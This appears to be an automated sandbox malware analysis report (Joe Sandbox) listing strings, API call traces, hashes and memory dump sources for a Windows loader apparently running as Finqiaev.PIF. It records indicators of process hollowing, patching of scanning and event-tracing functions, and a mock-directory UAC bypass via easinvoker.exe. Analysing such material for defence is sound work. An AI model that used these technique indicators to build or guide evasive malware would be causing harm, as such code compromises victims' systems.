Opcode Fuzzy Hash: 7803b0490fcba4a2daea5138e30f98f3625c50713645bcbaa5937a0e09de48dd
Instruction Fuzzy Hash: 4A016276302114ABEB10CE15D5C4B66BBA9DF823D5F048491E906EB101C3B8EC90CFA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: veaiqniF.pifPID: 7952, Parent PID: 7860COMMON

Non-executed Functions

Function 00430870 Relevance: 6.4, Strings: 5, Instructions: 121COMMON

Download Yara Rule

Strings

runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpall goroutines are asleep - deadlock!godebug: unexpected IncNonDefault of cannot create context from nil parenttoo many Authorities to pack (>65535)t, xrefs: 00430A68
VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: expected an RSA public key, got %Ttls: malformed key_sha, xrefs: 00430A32
%, xrefs: 00430A71
bad g0 stackself-preemptbad recoverybad g statusentersyscallcas64 failedabi mismatchRCodeSuccessRCodeRefusedGetConsoleCPnot pollableremote errorc hs traffics hs trafficc ap traffics ap trafficclose notifyMime-VersionX-ImforwardsX-Powered-ByContent Type (sensit, xrefs: 00430A17
CreateWaitableTimerEx when creating timer failedparsing/packing of this type isn't available yetfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curveCould not convert to time, passing current time.x509: X25519 key enc, xrefs: 00430A4D

Memory Dump Source

Source File: 0000000A.00000001.1622599769.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.1622599769.000000000088B000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000001.1622599769.000000000088F000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000001.1622599769.00000000008AB000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000001.1622599769.00000000008B5000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_veaiqniF.jbxd

Similarity

API ID:
String ID: %$CreateWaitableTimerEx when creating timer failedparsing/packing of this type isn't available yetfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curveCould not convert to time, passing current time.x509: X25519 key enc$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: expected an RSA public key, got %Ttls: malformed key_sha$bad g0 stackself-preemptbad recoverybad g statusentersyscallcas64 failedabi mismatchRCodeSuccessRCodeRefusedGetConsoleCPnot pollableremote errorc hs traffics hs trafficc ap traffics ap trafficclose notifyMime-VersionX-ImforwardsX-Powered-ByContent Type (sensit$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpall goroutines are asleep - deadlock!godebug: unexpected IncNonDefault of cannot create context from nil parenttoo many Authorities to pack (>65535)t
API String ID: 0-1005992549
Opcode ID: 4f18a8ab7f1fc0e6ed754dd09081ecf5ba98835150bc7094af54289576bc5370
Instruction ID: d6b05460dce053fcb725ba51d2c67ca3e53d8b493b6d73661264cc7acd7f9677
Opcode Fuzzy Hash: 4f18a8ab7f1fc0e6ed754dd09081ecf5ba98835150bc7094af54289576bc5370
Instruction Fuzzy Hash: 4D51F4B45087018FD300EF25D194B5ABBF0BF8A718F009A6EE8988B392D739D945CF56

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Finqiaev.PIFPID: 8020, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	404
Total number of Limit Nodes:	23

Executed Functions

Function 0410CA40 Relevance: 214.7, APIs: 9, Strings: 109, Instructions: 8183COMMON

Download Yara Rule

Strings

DlpCheckIsCloudSyncApp, xrefs: 04116602
can, xrefs: 04112438
I_QueryTagInformation, xrefs: 0411598F
RtlAllocateHeap, xrefs: 041167C6, 0411682C
NtDeviceIoControlFile, xrefs: 04116993
CryptSIPVerifyIndirectData, xrefs: 0410CE90
ntdll, xrefs: 041159A8, 041159BC, 041167AA, 041167DD, 04116810, 04116843, 04116876, 04116FAA, 04116FDD, 04117010, 04117043, 04117076, 041170A9, 041170DC, 0411710F, 04117142, 04117175, 041171A8, 041171DB, 0411720E, 04117241, 04117274, 041175E9
iexpress.exe, xrefs: 0410D6D8
OpenSession, xrefs: 0410CAAA, 0410D3B9, 0410D4DA, 0410D5E7, 0410D6EE, 0410DAB1, 0410DC66, 0410DE0C, 0410DFA8, 0410E0C1, 0410E235, 0410E8FC, 0410E9AA, 0410EC5C, 0410EE8A, 0410EF82, 0410F19D, 0410F54D, 0410F5D0, 0410F6E8, 0410F800, 0410F90C, 0410FB4F, 0410FDEE, 0410FF87, 04110127, 041103ED, 0411051D, 04110828, 04110953, 04110AAB, 04110BDB, 04110C57, 0411100C, 04111242, 041113B6, 0411154A, 041116FA, 04111B65, 04111D7B, 04111E23, 04111FC8, 041122D5, 04114100, 0411439B, 041144A8, 04114645, 0411487B, 04114920, 04114BAB, 04114D4F, 0411504C, 04115253, 04115364, 04115465, 0411576F, 041158A3, 04115ADA, 04115DCB, 04115E59, 041161AC, 041163B2, 04116461, 041166A1, 04116898, 04116AFC, 04116DD5, 041173FB, 0411756F
DlpGetWebSiteAccess, xrefs: 04116668
spp, xrefs: 04116EDE
NtOpenFile, xrefs: 041171F7
Kernel32, xrefs: 04116A10, 04116A1F, 04116A6A
VirtualProtect, xrefs: 04116C54
mssip32, xrefs: 0410CE74, 0410CEA7, 0410CEDA
NtSetSecurityObject, xrefs: 041159A3
Ntdll, xrefs: 04116989, 04116998, 041169A7, 041169B6
kernel32, xrefs: 04116C05, 04116C38, 04116C6B, 04116C9E, 04116CD1, 04116D04, 04116D37
SetUnhandledExceptionFilter, xrefs: 04116D20
EtwEventWriteEx, xrefs: 0411722A
UacUninitialize, xrefs: 041121BA
CryptSIPGetSignedDataMsg, xrefs: 0410CEC3
NtWaitForSingleObject, xrefs: 041167F9
MZP, xrefs: 04115FC7
RtlCreateQueryDebugBuffer, xrefs: 0411685F
FindCertsByIssuer, xrefs: 0410CD47
LdrLoadDll, xrefs: 0411715E
ScanBuffer, xrefs: 0410CB72, 0410CDE7, 0410D011, 0410D556, 0410D663, 0410D76A, 0410DB2D, 0410DCE2, 0410DE88, 0410DF2C, 0410E13D, 0410E1B9, 0410E880, 0410EACA, 0410ECD8, 0410EDE2, 0410EF06, 0410F334, 0410F4D1, 0410F87C, 0410FBCB, 0410FE8F, 04110003, 041101C3, 04110371, 0411063F, 041107AC, 041108D7, 04110DCB, 04111088, 0411114A, 041112BE, 0411133A, 04111BE1, 04111E9F, 0411213E, 04114008, 04114297, 041146E8, 041147FF, 0411499C, 04114A37, 04114B2F, 041151A5, 041154E1, 0411566C, 0411591F, 04115C78, 04115F51, 0411606E, 04116130, 04116559, 041174F3
EnumServicesStatusExW, xrefs: 041169ED
NtCreateSection, xrefs: 0411705F
IconIndex=, xrefs: 04111524
NtAccessCheck, xrefs: 0411712B
acS, xrefs: 04112425
smartscreenps, xrefs: 0410D11A, 0410D14D, 0410D180
EtwEventWrite, xrefs: 0411725D
DlpNotifyPreDragDrop, xrefs: 041165CF
SxTracerGetThreadContextDebug, xrefs: 04116EC7
VirtualAlloc, xrefs: 04116BEE
NtQueryVirtualMemory, xrefs: 04116FC6
Advapi, xrefs: 041169C5, 041169D4, 041169E3, 041169F2, 04116A2E, 04116A3D, 04116A4C
C:\Users\Public\Libraries, xrefs: 0410DA1F
HotKey=, xrefs: 04111658
EnumServicesStatusExA, xrefs: 041169DE
LdrGetProcedureAddress, xrefs: 04117191
Initialize, xrefs: 0410CB0E, 0410D8B2, 0410DA35, 0410DBEA, 0410DD90, 0410E045, 0410EB46, 0410EFFE, 0410F2B8, 0410F3C2, 0410FAA9, 0410FCE3, 0410FF0B, 0411023F, 041106DD, 04110D4F, 04110F14, 04114DCB, 041155F0, 041159E2, 041164DD, 04116D59, 04117477
RtlQueryProcessDebugInformation, xrefs: 041169B1
psapi, xrefs: 04116A01
BCryptQueryProviderRegistration, xrefs: 0410CFA5, 0411586F
CreateProcessAsUserW, xrefs: 04116A38, 04116A65
NtWriteVirtualMemory, xrefs: 041171C4
@^@, xrefs: 0410F0F0
UacScan, xrefs: 0410CC3A, 0410D1A2, 0410D29A, 0410D836, 0410E804, 0410ED66, 0410F64C, 0410FC67, 04110E98, 041111C6, 04111C5D, 04112044, 04112236, 04112351, 0411417C, 04114524, 041145C9, 04114764, 04114AB3, 04114E47, 04114F54, 04115129, 04115574, 041156F3, 04115A5E, 04115B80, 04115ED5, 04115FF2, 041162A4
CreateProcessAsUserA, xrefs: 04116A29
NtQuerySecurityObject, xrefs: 041170F8
DlpGetArchiveFileTraceInfo, xrefs: 04116635
bcrypt, xrefs: 0410CF89, 0410CFBC, 0410CFEF, 04115860, 04115874, 04115888, 0411643F
URL=file:", xrefs: 041114D0
EnumProcessModules, xrefs: 041169FC
^^Nc, xrefs: 0410DEFE, 0410EA9C
sppwmi, xrefs: 04116F11
C:\Windows\SysWOW64, xrefs: 041122AC
BCryptVerifySignature, xrefs: 0410CF72, 0411585B, 04116428
BCryptRegisterProvider, xrefs: 0410CFD8, 04115883
connect, xrefs: 04116A56
OpenProcess, xrefs: 04116C87
GET, xrefs: 0410F7DB
C:\\Users\\Public\\Libraries\\, xrefs: 04110E3B
UacInitialize, xrefs: 0410CBD6, 0410D21E, 0410D92E, 04110A2F, 04114084, 04114FD0, 04115BFC, 04116A80
NtOpenSection, xrefs: 0411702C
DllRegisterServer, xrefs: 0410D169
sppc, xrefs: 04116F44, 04116F77
C:\\Windows \\System32\\easinvoker.exe, xrefs: 0411426E
EnumServicesStatusA, xrefs: 041169C0
NtQueryDirectoryFile, xrefs: 041169A2
DllGetClassObject, xrefs: 0410D103, 04110753, 04116EFA
C:\Windows\System32\, xrefs: 0410D4B1, 041145A2, 041150DE
.png, xrefs: 0410DBA3, 0410E2AB, 0411729B, 041172E1, 0411732B, 04117352
NtMapViewOfSection, xrefs: 04117092
advapi32, xrefs: 04115994
ScanString, xrefs: 0410CC9E, 0410CD77, 0410CEFC, 0410D08D, 0410D316, 0410D435, 0410D9AA, 0410EA26, 0410EBC2, 0410F07A, 0410F121, 0410F219, 0410F43E, 0410F764, 0410F988, 0410FA2D, 0410FD72, 041100AB, 041102BB, 04110599, 04110B27, 04110CD3, 04110F90, 04111451, 041115C6, 0411167E, 04111CFF, 04111F4C, 041141F8, 0411431F, 0411442C, 04114EC3, 041152CF, 041153E0, 041157EB, 04115D4F, 04116228, 04116336, 0411671D, 04116914, 04116B78, 04116E51, 0411737F
SLGetEncryptedPIDEx, xrefs: 04116F60
http, xrefs: 0410F4AE
DllGetActivationFactory, xrefs: 0410D136
CreateProcessA, xrefs: 04116A0B
SLGatherMigrationBlob, xrefs: 04116F2D
NtAlertResumeThread, xrefs: 04116793
TrustOpenStores, xrefs: 0410CCF9
FlushInstructionCache, xrefs: 04116CED
CryptSIPGetInfo, xrefs: 0410CE5D
CreateProcessWithLogonW, xrefs: 04116A47
.url, xrefs: 041109E3
NtQuerySystemInformation, xrefs: 04116984
NtOpenProcess, xrefs: 041159B7, 041175E4
EnumServicesStatusW, xrefs: 041169CF
WriteVirtualMemory, xrefs: 04116CBA
[InternetShortcut], xrefs: 041114C1
DEEX, xrefs: 0410CA83
NtQueryInformationThread, xrefs: 04116FF9
cmd /c "C:\\Windows \\System32\\easinvoker.exe", xrefs: 04114309
C:\Users\Public\, xrefs: 041109D8, 0411176A
endpointdlp, xrefs: 041165E6, 04116619, 0411664C, 0411667F
ws2_32, xrefs: 04116A5B
VirtualAllocEx, xrefs: 04116C21
WintrustAddActionID, xrefs: 0410CD20
wintrust, xrefs: 0410CD0A, 0410CD31, 0410CD58
WinHttp.WinHttpRequest.5.1, xrefs: 0410F6C2
CreateProcessW, xrefs: 04116A1A
NtReadVirtualMemory, xrefs: 041170C5
NtGetWriteWatch, xrefs: 04116F93

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Path$FileName$CloseName_$AddressAttributesCurrentFreeLibraryModuleProcProcessWrite
String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
API String ID: 976750054-2902499223
Opcode ID: 48fd5c8a2035c70a330b57b670423a5cfa6e2239f7915ae0acec345bb3aa12ad
Instruction ID: 356d8c8943496306d1fd1241ef1c0a8819ec3f0f726ea63b7293459b5b4a53da
Opcode Fuzzy Hash: 48fd5c8a2035c70a330b57b670423a5cfa6e2239f7915ae0acec345bb3aa12ad
Instruction Fuzzy Hash: A8F31B35A011198BEB11EB64DD80ADEB3B6AF8560CF1044E6E149B7361DB34FF858F89

Uniqueness

Uniqueness Score: -1.00%

Function 040D7E4C Relevance: 41.7, APIs: 7, Strings: 16, Instructions: 1478
nativethreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 040CFD38: GetProcAddress.KERNEL32(0414A358,00000000), ref: 040CFD97
Part of subcall function 040CFD38: GetCurrentProcess.KERNEL32(0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040CFDE3
Part of subcall function 040CFD38: FreeLibrary.KERNEL32(0414A358,00000000,0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000), ref: 040CFDF4

GetThreadContext.KERNEL32(0414A3FC,0414A44C,ScanString,0414A3D0,040D9710,UacInitialize,0414A3D0,040D9710,ScanBuffer,0414A3D0,040D9710,ScanBuffer,0414A3D0,040D9710,OpenSession,0414A3D0), ref: 040D85CE
NtReadVirtualMemory.NTDLL(0414A3F8,0414A4E8,0414A520,00000004,0414A528), ref: 040D882B
NtUnmapViewOfSection.NTDLL(0414A3F8,040DAF38), ref: 040D89A6

Part of subcall function 040CFB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040CFB8D
Part of subcall function 040CFB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040CFB93
Part of subcall function 040CFB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040CFBB3

NtWriteVirtualMemory.NTDLL(0414A3F8,0414A524,00000000,0414A534,0414A528), ref: 040D8F89
NtWriteVirtualMemory.NTDLL(0414A3F8,0414A4E8,0414A524,00000004,0414A528), ref: 040D90FC
SetThreadContext.KERNEL32(0414A3FC,0414A44C,ScanBuffer,0414A3D0,040D9710,ScanString,0414A3D0,040D9710,Initialize,0414A3D0,040D9710,0414A3F8,0414A4E8,0414A524,00000004,0414A528), ref: 040D9272
NtResumeThread.NTDLL(0414A3FC,00000000), ref: 040D927F

Part of subcall function 040CFCD8: LoadLibraryW.KERNEL32 ref: 040CFCEA
Part of subcall function 040CFCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 040CFCF7
Part of subcall function 040CFCD8: NtWriteVirtualMemory.NTDLL(0414A3F8,00000000,?,00000001,?), ref: 040CFD0E
Part of subcall function 040CFCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,040D9710,ScanString,0414A3D0,040D9710,Initialize,0414A3D0,040D9710,UacScan,0414A3D0,040D9710,UacInitialize,0414A3D0), ref: 040CFD1D

Strings

BCryptVerifySignature, xrefs: 040D94CE
NtOpenObjectAuditAlarm, xrefs: 040D958F
OpenSession, xrefs: 040D8237, 040D835A, 040D95D2
ScanString, xrefs: 040D8030, 040D81C6, 040D854F, 040D8735, 040D88BC, 040D8CD8, 040D8E96, 040D9006, 040D9179, 040D9464, 040D9511
ScanBuffer, xrefs: 040D7E85, 040D7F4F, 040D7FD7, 040D83CB, 040D846D, 040D87A6, 040D892D, 040D8AC0, 040D8D49, 040D8F07, 040D9077, 040D91EA, 040D93DE, 040D9643
advapi32, xrefs: 040D95A8
NtReadVirtualMemory, xrefs: 040D957B
I_QueryTagInformation, xrefs: 040D95A3
UacScan, xrefs: 040D7EF6, 040D810E, 040D8653, 040D8A4F, 040D8BC3, 040D92FC
BCryptQueryProviderRegistration, xrefs: 040D94E2
ntdll, xrefs: 040D9580, 040D9594, 040D95BC
NtSetSecurityObject, xrefs: 040D95B7
BCryptRegisterProvider, xrefs: 040D94F6
Initialize, xrefs: 040D8167, 040D86C4, 040D884B, 040D8C34, 040D8E25, 040D8F95, 040D9108, 040D936D
bcrypt, xrefs: 040D94D3, 040D94E7, 040D94FB
UacInitialize, xrefs: 040D80B5, 040D82E9, 040D84DE, 040D85E2, 040D89DE, 040D8B52, 040D928B

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextFree$AllocateCurrentHandleLoadModuleProcessReadResumeSectionUnmapView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 98964713-1058128293
Opcode ID: 663cd06bf1335407f5951c38ef2a8edeb928b463cf62e61fd94e7cfa4e34b240
Instruction ID: b55f9f1877b2a272821afea356edc749e7d95fc32f9d723c2c530355a3652aa7
Opcode Fuzzy Hash: 663cd06bf1335407f5951c38ef2a8edeb928b463cf62e61fd94e7cfa4e34b240
Instruction Fuzzy Hash: F3D23E71A402199BEB11EB64DD90FCEB3B9AF45308F1145A2E144BB215DA30FF86CF99

Uniqueness

Uniqueness Score: -1.00%

Function 040B5DDC Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 040B5DF8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5E16
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5E34
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 040B5E52
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,040B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 040B5E9B
RegQueryValueExA.ADVAPI32(?,040B6048,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,040B5EE1,?,80000001), ref: 040B5EB9
RegCloseKey.ADVAPI32(?,040B5EE8,00000000,00000000,00000005,00000000,040B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5EDB
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 040B5EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 040B5F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 040B5F0B
lstrlen.KERNEL32(00000000), ref: 040B5F36
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 040B5F7D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 040B5F8D
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 040B5FB5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 040B5FC5
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 040B5FEB
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 040B5FFB

Strings

Software\Borland\Locales, xrefs: 040B5E0C, 040B5E2A
., xrefs: 040B5F48
Software\Borland\Delphi\Locales, xrefs: 040B5E48

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-3917250287
Opcode ID: f01c1e1e0a223ba9f55943cbe8f61314a8c810c2fd8dabe9f0d0d7df936e529b
Instruction ID: e29bc7663b756f58ecfa3543664b940b475f797ed103569594633155af47886c
Opcode Fuzzy Hash: f01c1e1e0a223ba9f55943cbe8f61314a8c810c2fd8dabe9f0d0d7df936e529b
Instruction Fuzzy Hash: 5951A871A0024C7EFB25D7A4CC46FEF77EC9B04788F4004A1A684FA181E674BA548BE5

Uniqueness

Uniqueness Score: -1.00%

Function 040CFCD8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 040CFCEA
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 040CFCF7
NtWriteVirtualMemory.NTDLL(0414A3F8,00000000,?,00000001,?), ref: 040CFD0E
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,040D9710,ScanString,0414A3D0,040D9710,Initialize,0414A3D0,040D9710,UacScan,0414A3D0,040D9710,UacInitialize,0414A3D0), ref: 040CFD1D

Strings

BCryptVerifySignature, xrefs: 040CFCF5
bcrypt, xrefs: 040CFCE9

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction ID: 367dc9645746aefa72b4f01c5e573656a8fc336e5dadcb1229a4fca86c52a903
Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction Fuzzy Hash: B8F089325052556EF15062646C40EFF76AECBC1778F148A2DF594AA1C0D662AD4482FB

Uniqueness

Uniqueness Score: -1.00%

Function 040CFB7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040CFB8D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040CFB93
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040CFBB3

Strings

C:\Windows\System32\ntdll.dll, xrefs: 040CFB88
NtAllocateVirtualMemory, xrefs: 040CFB83

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: 50bca006be28b90ecfd8ecca1c634a1d7605c993ecb31e36c46f4b67d1328cc4
Instruction ID: a7b7b31957f083bb11fe1bf3e9bd29f394e4987db8bdbf0850288cac5d04bc32
Opcode Fuzzy Hash: 50bca006be28b90ecfd8ecca1c634a1d7605c993ecb31e36c46f4b67d1328cc4
Instruction Fuzzy Hash: E0E0E5B6240209BBDB00DF98D941EDB37ECEB08740B004415BA08E7201D735E9508BA6

Uniqueness

Uniqueness Score: -1.00%

Function 040CFB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040CFB8D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040CFB93
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040CFBB3

Strings

C:\Windows\System32\ntdll.dll, xrefs: 040CFB88
NtAllocateVirtualMemory, xrefs: 040CFB83

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: 54de8600f5b9d64f73ada4c0214ae63c68275fa51d4f1fb03289492b3e88b940
Instruction ID: c4117db52c72022879fe51bdc7d80b42fd3ba03551a197befbaff36f9703625b
Opcode Fuzzy Hash: 54de8600f5b9d64f73ada4c0214ae63c68275fa51d4f1fb03289492b3e88b940
Instruction Fuzzy Hash: 51E012B624020DBBCB00EF98D981ECB37ECEB08740F004406BA08EB201DB35F950CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 040CFD38 Relevance: 4.6, APIs: 3, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(0414A358,00000000), ref: 040CFD97
GetCurrentProcess.KERNEL32(0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040CFDE3
FreeLibrary.KERNEL32(0414A358,00000000,0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000), ref: 040CFDF4

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressCurrentFreeLibraryProcProcess
String ID:
API String ID: 4006369052-0
Opcode ID: 986dd824a8754cd4c4cb1db69f1774ff7cd07cf09d9633d06f7f9f2d4bba3c64
